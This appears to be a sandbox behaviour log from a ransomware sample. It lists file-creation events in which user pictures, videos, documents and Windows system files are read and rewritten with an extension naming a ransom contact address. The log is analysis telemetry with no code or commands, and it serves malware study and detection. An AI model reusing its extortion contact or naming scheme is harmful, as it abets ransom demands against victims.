| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\U7Ck jv55O 3qWII.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\ub9qe6TOp3SX.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\ub9qe6TOp3SX.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\uZIhXNzlX.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\uZIhXNzlX.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\wQQk0L8e kW7OrR.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\wQQk0L8e kW7OrR.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\-HqxMx4\ee1Ih6lgu9.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\-HqxMx4\ee1Ih6lgu9.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\-HqxMx4\USbqAKZ6n6OwH.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\-HqxMx4\USbqAKZ6n6OwH.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\6SyWqeVc5yzr\pPj1rYXdjbiG0.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\6SyWqeVc5yzr\pPj1rYXdjbiG0.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\CDMgwuC203qNBjRaKV.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\CDMgwuC203qNBjRaKV.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\hZLEJZ5kPOONV9M43J.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\hZLEJZ5kPOONV9M43J.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\XIRRf-mmeVpDe S.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\XIRRf-mmeVpDe S.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr\W8JKzPrZW\LUENR7YNO2.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr\W8JKzPrZW\LUENR7YNO2.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\aW44WW0 Tu\w8HLSeE0oQxJXZaE.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\aW44WW0 Tu\w8HLSeE0oQxJXZaE.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\-3cn.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\-3cn.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\0dK0fS-q-ngHr.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\0dK0fS-q-ngHr.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\4jXktZFjLG.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\4jXktZFjLG.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\4KzNyVSkFGKutyf.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\4KzNyVSkFGKutyf.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\EMsxonpi.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl\EMsxonpi.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\nAikDiB6TQqHeUWBw\96EOuJCDhQn 6JOI1Q7u.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\nAikDiB6TQqHeUWBw\96EOuJCDhQn 6JOI1Q7u.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\nAikDiB6TQqHeUWBw\xvaxP_icfQfXs1.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\nAikDiB6TQqHeUWBw\xvaxP_icfQfXs1.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\p31kod5hJ.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\p31kod5hJ.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\TEaEn.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\TEaEn.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\X0MqL_ZtdkVFYJuKw90y\3yxVf9oXogIhJtMTU.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\X0MqL_ZtdkVFYJuKw90y\3yxVf9oXogIhJtMTU.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\X0MqL_ZtdkVFYJuKw90y\A2RFCNVx BoJczT w.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\X0MqL_ZtdkVFYJuKw90y\A2RFCNVx BoJczT w.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Temp\FXSAPIDebugLogFile.txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Temp\FXSAPIDebugLogFile.txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Internet Explorer\brndlog.bak | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Internet Explorer\brndlog.txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\o2dzQZNBDDx1G3\I61omCuK.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\o2dzQZNBDDx1G3\I61omCuK.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\o2dzQZNBDDx1G3\SjTOgenTULJR.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\o2dzQZNBDDx1G3\SjTOgenTULJR.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\o2dzQZNBDDx1G3\xV6blnc72Q6KO.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ\o2dzQZNBDDx1G3\xV6blnc72Q6KO.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\DMbTxpr.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\DMbTxpr.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\oUGV.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\oUGV.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\pOaD9osIvTp9.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN\tv-bIyAk cNG\S PT0\pOaD9osIvTp9.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.bak | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
